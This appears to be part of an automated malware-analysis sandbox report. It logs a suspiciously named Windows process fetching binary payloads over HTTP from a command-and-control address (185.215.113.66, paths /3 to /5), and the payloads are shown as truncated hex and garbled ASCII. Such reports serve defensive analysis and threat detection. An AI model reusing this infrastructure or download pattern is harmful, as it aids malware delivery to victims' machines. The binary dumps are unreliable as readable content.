                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:19.357856989 CET248INData Raw: 0b 3e 1f 18 b4 22 57 d9 8b 7c 31 98 16 87 ae e9 52 72 6d 5d c2 16 1d 54 31 c6 26 50 53 c5 b3 54 51 99 ab e5 bf ce ab 5a 8a 71 45 74 67 a4 63 0c 5b 55 2a 2c 09 40 f8 fc e9 05 9a 85 93 2b 1f c2 e7 ee b8 e5 f1 4c c2 16 6f c2 52 95 cb 30 72 4d 77 66
                                                                                                                                                                                                                                                  Data Ascii: >"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh['3(@
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:19.358494043 CET1236INData Raw: b3 98 60 7b c2 fe 18 6e 6c 3b f9 ac a2 de d3 91 55 a0 66 42 35 cf 21 d2 35 e4 39 75 47 bc 4a 30 fd b3 ec 68 e2 05 c4 c5 0d b9 52 96 f9 ee 21 eb 75 28 d5 c0 2a 64 ef c0 3a ab 95 53 65 fa 72 6b 02 d9 89 0d 29 a1 42 a0 92 05 af 99 89 64 03 c4 b2 ec
                                                                                                                                                                                                                                                  Data Ascii: `{nl;UfB5!59uGJ0hR!u(*d:Serk)BdWmlE)Mt9G2?=L*{Pq CT dsHHw+~1uDu,;xuv&eaAwm])pQ`Hvn
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:19.358539104 CET1236INData Raw: 5d d4 ae 87 4b 4c 5c f5 f8 b1 42 1c 64 40 21 dd a9 b2 1b 90 9c 81 19 71 86 63 c3 42 58 66 10 97 16 6b 3d 84 2a 17 7d 6e 66 0d 82 1c 4b 89 f7 0c b4 fc 57 4c fe e5 46 ad 79 7f 9e 36 a4 b2 71 69 ed a1 f5 ad 6a 09 6a c9 cc 71 82 36 aa fa 62 12 93 06
                                                                                                                                                                                                                                                  Data Ascii: ]KL\Bd@!qcBXfk=*}nfKWLFy6qijjq6b&?:2c4]&`iDl=z4EdgAD7&iM:_GHkd*UDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:19.358551025 CET1236INData Raw: 15 0a b1 41 8b 4d 2d 18 0d 2f 21 95 f5 2c 5d 7f 02 b3 e1 61 f1 81 14 90 ff a6 59 49 c6 b6 95 e1 52 b6 70 e5 9f b1 d7 6f 16 6f 39 ca 52 7f 6a 8d eb 57 0c 60 75 2d b8 22 aa d4 b9 c2 57 7d 76 34 64 44 38 78 a0 68 d0 a0 44 9b 74 71 55 fa f6 a6 80 b6
                                                                                                                                                                                                                                                  Data Ascii: AM-/!,]aYIRpoo9RjW`u-"W}v4dD8xhDtqUl/2:O!iKv^l1=>rJ!;=wJo OhzO=q~qF.Bth]QL>uAZ Zva"HIbKd
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:19.358582020 CET372INData Raw: a7 0b 5d 78 01 81 ca 26 1f 25 74 75 05 19 3d b0 1b 48 25 b4 f8 03 2f d1 12 7d 8c 68 7f 2b 1b 0a 77 8a 84 a5 a5 79 c6 bd 2a 28 bd 56 a5 89 c5 23 51 70 8f 67 f7 89 2b f7 49 a4 23 bf a9 72 6b 72 a1 23 b4 b9 72 4c 77 89 7b 62 45 2a e3 8d 21 bb 4e dc
                                                                                                                                                                                                                                                  Data Ascii: ]x&%tu=H%/}h+wy*(V#Qpg+I#rkr#rLw{bE*!NlH|3Wr:E'rhtvG.wG6n=-zPK,,jhMRD Yi=8S7=3R]TwZW9^hx``\vkU&
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:19.359149933 CET1236INData Raw: 4d a1 d1 e7 27 05 b8 8e f4 9c 1d 95 99 e5 8c 61 b1 b2 98 8a 81 a4 59 8b c9 9a 08 ef 09 76 5f 8c fe 80 e6 77 ad 80 e9 26 d8 25 be 6b 87 19 22 2d 20 31 3f 33 75 6c a2 eb 32 ef 27 a4 4b 17 75 f1 73 04 32 85 17 e7 0f 29 03 a0 ea 5e 80 10 89 58 f6 ff
                                                                                                                                                                                                                                                  Data Ascii: M'aYv_w&%k"- 1?3ul2'Kus2)^XCO"N"^E]zgh[!nlIonB1jg'|]w<OyfG%Wl'X2c _'v^]XtCP8&S*.OU@:`#45/
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:19.478374004 CET1236INData Raw: 6c 2b 0e 37 89 41 c1 51 1a 35 4a 27 0e 75 79 5e 19 ed a2 b8 58 ee 3d f8 ed 0a 54 b2 c3 da e0 3f a6 32 68 dd 96 90 56 1c 08 09 b7 0e 67 b7 90 96 70 6b 2c ef ea 20 91 ff ad 1b 52 5e 43 96 21 a5 a9 ad 6f b4 9f 4f f5 dc 13 8e cc f2 ed c9 2e d5 e0 5e
                                                                                                                                                                                                                                                  Data Ascii: l+7AQ5J'uy^X=T?2hVgpk, R^C!oO.^;G@ ;/0#1myu)pLl!LugJ:hL"@hNUoZwAFiA;O"GaTP;|6z:A78jGr|OXvf~ZCen.+B];k


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  35192.168.2.1150046185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:21.784591913 CET166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:23.229258060 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:34:22 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 55040
                                                                                                                                                                                                                                                  Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "674b357a-d700"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 71 55 bf 68 00 78 5e 05 bf 77 f1 ce 6a 84 34 af 59 54 f4 9a 7f 2e 9e 56 5c 9f 90 cf 88 27 49 60 23 c8 18 58 ef 00 f5 4c be 7d 1c 91 c4 34 02 a2 5c 3c 0d 4e 55 81 f8 05 ac ee cb 01 3b 46 d2 9c 58 e4 0f 57 22 b2 cd 6b b7 cc 33 3f be b9 da e2 c1 f2 64 fc e6 50 f4 9a 92 a5 f5 09 a8 09 a7 c7 da 31 7d 87 96 31 55 a4 1a d0 ba a1 26 ba b8 99 69 1d 33 dc 14 0f 1c 89 01 e6 63 3c 95 aa 53 61 58 04 03 e1 40 77 fb 5f 23 b2 e6 ef 48 bb 0d da b9 71 4f 5c 1b bf 2d 19 31 22 20 7c 90 25 4c a9 42 7c 7d b5 72 c6 73 d7 e6 e2 bc c8 de e2 46 c0 f0 c7 86 98 ef 5b b4 36 d4 af 0f dd d9 cf 96 3a ae 7e 9f c1 2c 54 45 11 30 e9 3e f6 a0 0c 58 a7 ed 3c 7a d4 d4 8e 7e fd 5d 2c a2 dc 17 0f 69 98 fe 29 2d 23 fc 4f a1 61 fb e3 d4 f3 0f 4b b1 33 49 91 45 9f 62 e1 a2 13 f5 5c 5d 8f c4 f6 8b c7 30 c5 0b 16 f6 6f f6 71 a2 69 a7 be c7 a0 ad 0c 22 4b 33 e3 10 dd f4 ad 9d c9 f9 ba 6b 9d 18 b7 b7 99 bf f8 3e bf 51 8f e7 79 e1 e2 02 f7 6b a1 21 e1 93 c9 31 90 95 64 be 3c 55 a3 bc b1 6e 93 47 c8 b4 34 76 3f 40 1c 6f b5 f6 6f e2 0a a6 f3 70 3f [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: qUhx^wj4YT.V\'I`#XL}4\<NU;FXW"k3?dP1}1U&i3c<SaX@w_#HqO\-1" |%LB|}rsF[6:~,TE0>X<z~],i)-#OaK3IEb\]0oqi"K3k>Qyk!1d<UnG4v?@oop?t Q@>VeGy6-:p~w!:zq<|TwX?Fq)3Pr|\jFC4wa|zk9eT*G$IFxP!+*(Wjv2G6;axnMd<?IA0![eLQ'Ju$%6b$V"2yvRKbPUH!@uQ+Zp,j%nf]k1'+|~z0g[:e2?zO*_X8IhveZ9:iOSgly{`bx6R-bHWhgF[oDzz68lty<}Du56T;,{stYZL1"!hJy^cqVNWAy<I7fo-)m/$f55KqQ*chAZM,v@O$j ^t)%BlCWv[ZBO8:L=-
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:23.229274988 CET124INData Raw: 5b 45 cd 42 00 1c 84 28 01 50 de 3b 22 91 56 cf e9 a7 2b 5b f3 ba d0 65 3e d9 cc 07 bf 4f ee 6c a9 19 5b ee bb 28 49 cc e1 f2 28 87 3c e0 d7 ff a4 0a 34 6f 49 d4 2a 8b a8 f8 bc 1a 35 e9 59 59 81 c3 15 fd 6e cb be 09 bb e1 99 dc e7 12 87 9c 23 b5
                                                                                                                                                                                                                                                  Data Ascii: [EB(P;"V+[e>Ol[(I(<4oI*5YYn#XGqenlH=F<S["z{{"
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:23.346570969 CET1236INData Raw: 6c fe cd 45 55 b9 8c 37 fb e0 65 e2 c7 a6 e8 ca 2e e7 36 11 cb 44 07 75 cb 65 86 30 68 e9 80 ff a2 f2 50 8d 9f ef f0 d7 88 1a 9c d0 44 c8 07 20 87 df eb 5f aa 42 af 74 3b f3 0f c4 18 25 80 2a b4 f7 48 e6 5f 1a db a2 ab 62 43 40 ea 39 f6 86 e6 0a
                                                                                                                                                                                                                                                  Data Ascii: lEU7e.6Due0hPD _Bt;%*H_bC@97U8,/&U5Ck]ocRO3hW|Sz#0#|)8_wo=`w9rvM$&qfkc];j`PWbOxH2me7q-kAqD_Pk
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:23.346594095 CET1236INData Raw: 7b 36 a6 49 ac 18 96 02 5c 26 ff 36 f8 c6 2f da 11 03 0b 43 42 d5 f1 fa 41 49 12 5f 6a f7 0d ab 9c 22 da 0e e6 73 5c a7 63 55 c5 7a be 68 9a 7b ab 24 23 8f b8 90 f1 46 3f dc 40 7f eb fc ff f9 de 79 f0 46 f0 1c bf c3 28 8f 7e 59 df 83 6b 13 f2 9e
                                                                                                                                                                                                                                                  Data Ascii: {6I\&6/CBAI_j"s\cUzh{$#F?@yF(~YkV.3T#|;d!q?+y<ptwL(>qvj?}Ip9f&)ta/kkPSHD+$"S$>p\"}q@&}X~{4SSz99)T
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:23.346602917 CET248INData Raw: 7b c2 28 ec 12 68 73 af f0 35 fa 92 0d 6e d3 4c 18 d1 e8 8f c4 a1 15 0c 44 f9 b6 78 31 a0 fd 7f 79 99 72 c6 f0 73 47 e9 0f 40 94 99 fb e1 f0 b4 d5 8f 6d d3 2c 32 8b 19 0f 58 f0 2e 41 9c f2 6f 5b 46 89 a3 28 dc 95 c6 72 a2 e2 61 ac 48 43 c4 a9 bc
                                                                                                                                                                                                                                                  Data Ascii: {(hs5nLDx1yrsG@m,2X.Ao[F(raHC&i/r"j4izzA9cLWIt_h+nLh-=-&vqSO@O<0gm:TtwnKmhmm@A>xa!@ZcI:#u
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:23.346609116 CET1236INData Raw: 19 a0 24 4b da 1e 29 2e b8 90 9c 19 04 be a0 c4 89 13 1c 0f aa 93 20 f3 19 9e b4 84 fb e1 14 78 a7 00 52 e2 02 4c b2 23 82 28 ac f5 b8 d9 a2 cf 34 a1 59 dc ee fd 95 3e 18 9b 64 03 51 58 ab bf d0 e1 e3 e5 36 f2 4d fe 5c 19 c0 e8 22 65 10 8a 26 7e
                                                                                                                                                                                                                                                  Data Ascii: $K). xRL#(4Y>dQX6M\"e&~,r7e>l=U-v"HPC|)27gJ_nsZ'<!.xRt8HIDE1@P[lZ/\!A"7$yU?&
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:23.346621037 CET1236INData Raw: e3 c7 0b d2 07 66 a2 02 df 9b c5 ad ab 86 33 77 7c 85 cf 8e 02 e9 ff 0a 52 b6 86 0a 21 68 f0 58 ca f5 19 d1 1f 7e eb d9 06 ec 62 12 90 c3 a8 07 cc ab 65 62 96 7c 42 a0 c7 96 0d 36 40 4f ee 7a 37 4c 55 60 da 2d 0c 43 d9 ee 18 23 31 42 c0 08 0f e1
                                                                                                                                                                                                                                                  Data Ascii: f3w|R!hX~beb|B6@Oz7LU`-C#1B13*8:X5PyaRb;6CXX-+X0{r7^M(:{w9Oz6k`m"q2T;auZOn.i^
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:23.346631050 CET248INData Raw: 8b f1 53 ed 23 89 32 81 6a bd ac 31 f6 9e 1b 21 44 9f d0 ec 52 3c e7 1c f1 5f 27 92 ba 55 b5 ac 17 95 c8 e8 2a 81 72 92 e4 d3 9b 75 7a 3a 81 3a 47 c0 9d 6e d4 bb 70 d3 d3 62 2d fc c9 2d a8 43 c5 85 d8 06 4b 95 4d 8f 6a a5 64 23 d1 2f ec 3d 2b 2c
                                                                                                                                                                                                                                                  Data Ascii: S#2j1!DR<_'U*ruz::Gnpb--CKMjd#/=+,9D~GNR4:m{e13POt0:<E3 -zPqh_{,@K7IHJ<o:]v(-d*CZ`p7(uiHd=)d3@<
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:23.346642017 CET1236INData Raw: 17 43 81 f0 03 28 4e 24 a8 e2 3f 60 47 a1 6f 7b ec 56 d9 24 37 5a 16 c7 eb 35 dc 0e ed 65 da f8 49 f7 cc 2b 36 d8 0f 7d 66 42 a9 b8 85 ec bf 11 2a 77 a0 34 47 30 6f 7f 41 eb 96 c9 07 bc 08 47 23 99 e4 a4 6f f9 66 df 48 58 04 59 25 99 cb 97 2b f2
                                                                                                                                                                                                                                                  Data Ascii: C(N$?`Go{V$7Z5eI+6}fB*w4G0oAG#ofHXY%+CVFJq0`24NEEGWOI+3C^)^+KBSocNu\QlIj;vw(e7%3P8L97p,#0^4U[D.-Y
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:23.346647978 CET1236INData Raw: 5a ac 51 67 01 3a 92 a1 ff f7 16 2a 46 98 21 45 9c 86 aa 78 86 b6 91 f2 e4 79 5a 79 6c ff b8 36 11 0d 46 b5 28 67 4f 17 25 c6 46 1d f0 6e a1 5f 5c 30 a3 52 df 5f d9 a2 ad 4a ff 0f 95 c9 36 8d bf 83 c5 bf c8 e5 47 08 f9 e3 09 7d 86 8c 8b 98 db 6f
                                                                                                                                                                                                                                                  Data Ascii: ZQg:*F!ExyZyl6F(gO%Fn_\0R_J6G}oJ&bBypG`6~!!S'?`?\i#Y%3xZT/qU^bIn/n}JGG-vam2T5*a.v"[Fu#!D*
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:23.349133015 CET1236INData Raw: 0f b3 d3 05 79 4d 7a a8 6e 58 5a 01 53 d0 02 cb c3 2b 86 63 b6 7f 83 2e eb 0d 93 a1 9d ed 03 12 e4 de 0b d4 1f da f1 2b 75 78 ac 0d d8 d3 d1 37 d3 d4 f5 3d b8 11 26 a3 c7 da 52 4d 50 d2 ae 12 55 a0 a6 f8 4b e6 c8 f4 f8 85 9b 93 57 cb 3a 31 c6 52
                                                                                                                                                                                                                                                  Data Ascii: yMznXZS+c.+ux7=&RMPUKW:1RuY[?@b DYSC^b`a85+N="p-1j'`G$hixmdkeym8)|Sm*7Q%gDUw'P(+P{lC\q"b


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  36192.168.2.1150048185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:25.774879932 CET166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:27.083558083 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:34:26 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 63232
                                                                                                                                                                                                                                                  Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "67497f08-f700"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: 3-;)VX*\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS*;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t|*wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[*9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:27.083575010 CET124INData Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d
                                                                                                                                                                                                                                                  Data Ascii: 1a@ #o;R`_|#|H%0SH9~`aa-1gH)2sLGnc <k[63
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:27.084974051 CET1236INData Raw: d3 d3 c0 0b 8a 7f b8 97 4e 22 4f ca 14 06 f0 a4 fe ab cc ab ac 94 22 41 1c 65 72 b1 a1 b5 80 5e 31 c0 cd f5 46 7f 2e a6 44 0d c3 f3 5b 60 96 13 5c 9d b4 83 4f f6 f0 35 44 7d 2b ea 99 13 61 4c 2e 41 60 a3 15 7d 34 29 77 78 23 0f 30 4a ae 21 f3 ba
                                                                                                                                                                                                                                                  Data Ascii: N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz|dNz=5%xuA~P{m2[Nz"Nz/`nO!|I7XL!z?K3GB&CPXL_6<$v!afZ96*.3
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:27.085002899 CET1236INData Raw: 2c 88 74 8b b7 76 62 a3 c9 c5 27 d0 2a 27 5c 3d 75 89 75 b6 08 e3 64 b7 af 9f 42 79 11 1c 3a 2f e8 fa 1f 02 ca 7a 20 84 ab 43 6c 66 1d 11 79 ac b5 00 76 a0 c4 46 b4 fc 34 6f d3 2b 57 54 fd 5a a7 ba 6a 03 af 6d 51 1f 49 41 51 5f 04 c7 8a c5 5b a2
                                                                                                                                                                                                                                                  Data Ascii: ,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]rG.sM=Is$aZt&ID. MzL2V7*QIu;5f;kIB*w%zH-L=_k_/i
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:27.085015059 CET248INData Raw: 7a fe 71 03 99 6d 41 8c fb 0c b8 8a 45 80 8e 7f ee d8 c3 f9 c4 c0 8c 7f b4 fd 48 e2 80 d4 a2 0b e7 83 a2 eb b5 e0 d3 1c 9b c2 5d 36 a2 1a fd fc b3 74 e2 3a 01 a3 46 ae f8 b7 c7 f6 76 71 10 6c 44 90 f8 85 c7 d1 11 19 b7 46 54 d6 b3 fe b3 a2 7c 9a
                                                                                                                                                                                                                                                  Data Ascii: zqmAEH]6t:FvqlDFT|JG9_,l{!G6eMqP_dUxqZI^lxA`_}Kc7aRk/;V)(9!U}hs0{TMuVZ1_7<zjv3
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:27.085680962 CET1236INData Raw: fc 04 b1 a3 61 a9 3e e9 b8 4f 99 39 08 9c 69 da 46 18 36 3a 4b 73 dc 66 d7 fd c6 fb 18 c4 f0 71 ec dd 69 3d 4e 7f d9 ab 61 42 45 69 3f 09 c2 f8 94 ed f4 9a d9 59 30 4f 65 5b 90 4f 6d 9a d5 80 e7 09 b9 42 31 f9 9c c9 1a 0a 46 5f a8 4d 51 63 eb a7
                                                                                                                                                                                                                                                  Data Ascii: a>O9iF6:Ksfqi=NaBEi?Y0Oe[OmB1F_MQc ~)sWh7z4>(our*Q< M9K=2B[,/+?~gg).L{A]rbAx=p5KZ;ZrZ_f5dQUe
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:27.085721016 CET1236INData Raw: c7 b6 4a 74 d2 29 ae 30 5a 13 0d c5 bd ad 85 62 e6 41 ba 2c db e4 33 17 af 92 97 e8 c2 50 6f d3 93 2b 1a d9 ef c8 8c ad 28 76 b1 0a 03 22 aa a4 9d d6 19 b7 f4 a3 21 68 33 93 55 49 99 92 85 49 83 f2 c1 f7 84 ba 94 17 67 0a b6 68 7c b3 3e 5f 83 de
                                                                                                                                                                                                                                                  Data Ascii: Jt)0ZbA,3Po+(v"!h3UIIgh|>_C+]`OG3de{tlnAj}xAD|kH9GV^zmT{y;c}w3pRy<V=5a=dUYW-XW>1-2$i00*vq=,P
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:27.085731983 CET248INData Raw: 4d 81 90 a2 d9 c9 ea 87 af e7 54 a4 00 ee 8f 86 4d 10 1b 06 cf bd 41 22 9f f2 47 09 3b 4c 20 17 59 91 37 2b c7 68 ae 66 7e 0f 1e 64 ca 7d 4d 56 36 9b 98 57 4e 5b 31 b4 bc 26 40 53 81 3d 1a 94 77 ce 40 60 b6 2c f1 68 f6 fc 84 5d 67 33 81 46 d2 a2
                                                                                                                                                                                                                                                  Data Ascii: MTMA"G;L Y7+hf~d}MV6WN[1&@S=w@`,h]g3Fq${:T;;hkRfjF7aC;@58Ht}uos(h/R#`qk1#a_Jx;JO)j <SmPC9P/ScTvD6>$Z
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:27.087491035 CET1236INData Raw: 4e 19 dd 3f ca 7c 76 56 25 cf d8 3b bc 0b cb e3 6b 61 d1 e8 74 ba 7b 9f f2 d9 3c 68 04 7d 8e 0f 0c b1 61 58 b2 89 2e a3 d7 a5 a6 67 de 63 77 82 29 21 e5 dc b8 b5 12 44 63 2f 26 6e 80 a8 59 93 9f f3 cb a5 38 f6 7d 47 18 0a fd 1a 10 c3 fc da 46 76
                                                                                                                                                                                                                                                  Data Ascii: N?|vV%;kat{<h}aX.gcw)!Dc/&nY8}GFvfnz)W'#vqDVkjGT$@o|fRdgFUVt't99#7><[CwN^>nxLWU63tuI-KS<9~
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:27.087595940 CET1236INData Raw: e5 38 c4 33 36 b0 03 f5 cd c9 c0 30 b1 37 44 42 dc 55 49 55 be c3 68 9c 69 c1 11 97 33 09 f5 76 ba 2b 0b 44 51 96 3f 74 91 be 35 c3 11 5f 83 8f cf 2a 84 ec eb a0 7d 4e 67 ca 43 62 ca 3b 51 15 6c 2a 2d 10 a2 fa b7 6f fe 5b 39 e1 7d f2 d3 40 47 ee
                                                                                                                                                                                                                                                  Data Ascii: 83607DBUIUhi3v+DQ?t5_*}NgCb;Ql*-o[9}@Gg~@kk3;w=eZLp<0 X6Gj6b1T2<=dMp.t/>,7HD)a,Cs} %)CLXw,df$F>k
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:27.206928015 CET1236INData Raw: 0a 6a 9f 08 33 5a b8 00 48 32 c0 9b 00 87 ff 75 44 54 a0 95 d1 eb 90 73 bc 0a c4 df 11 25 1f 31 aa b6 c3 e9 8c f3 97 77 2f 07 de 35 8c cb ba ad dd 7f 5a 81 a2 04 d4 61 14 71 3a 99 5f 6b 8e a0 d8 d1 1f 7d 48 03 a6 3a b5 d6 73 77 b7 85 37 8f 19 14
                                                                                                                                                                                                                                                  Data Ascii: j3ZH2uDTs%1w/5Zaq:_k}H:sw7d%hkc}s9BaOQQs?pisbbMFvQSE@l=)0x"./<x&+n>14#<Xo_:*q6!9


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  37192.168.2.1150050185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:29.569645882 CET166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:30.871196032 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:34:30 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 66816
                                                                                                                                                                                                                                                  Last-Modified: Thu, 05 Dec 2024 16:18:27 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "6751d253-10500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 59 c8 13 50 1d f8 00 28 d4 3c 88 34 df 2b 4d 68 41 bc 72 70 ee 95 59 33 21 ac df a3 da 03 6e e1 9c 2f 7d c1 43 68 fd e7 23 38 43 6a 3b b3 0a 09 d6 00 18 a1 97 80 41 bb ee 53 60 95 b4 4b 94 36 fb 6b 23 f1 38 23 5f 5e b1 cc 57 ab e1 40 5f 96 22 6c 28 95 9b eb bc 8a 30 0f 9c d5 a9 d6 78 ae c9 24 73 55 19 2c 3f 43 87 88 19 3a e6 96 f8 ab a9 bb 9f 2a d3 90 bc 5e 4f 8f e3 37 56 8f d7 1c b4 67 1a 15 23 da 86 cd 87 6d f1 6d d3 9a c3 52 f8 c9 86 11 28 75 8e b0 49 f1 80 55 f8 20 01 99 bd 5e 01 23 f9 03 ba b4 ce 7e 70 67 36 02 f3 67 dc 6f 71 bc 54 48 14 d2 cb ec fd ff c1 5b f9 db 3f 73 54 b2 37 94 20 dc d2 62 83 57 4f 56 4a f2 d4 16 82 ea 1c 43 45 76 8b 93 95 d7 74 d2 53 86 f4 07 57 28 0a 98 f0 2e 4d 2d 61 c0 ac c8 eb 46 79 7d 6b 1b d4 aa e3 66 f9 df 88 7f 3e 1b 68 de 2b dc 80 f6 8b 14 02 0c 52 d8 eb 05 75 99 8f cf d1 31 5d 72 f6 c3 04 0f 22 6e 0a 4c 9d 6a db 4c 65 8b b0 dd cb c0 12 9a 0a aa cb 8c d6 09 0f 2e 59 fd 21 3b 06 72 63 2f d9 19 c7 6b fa 10 7b b9 44 cb f6 f8 f5 23 52 e0 c8 1a 00 16 71 b3 ab 8c e2 0c [TRUNCATED]
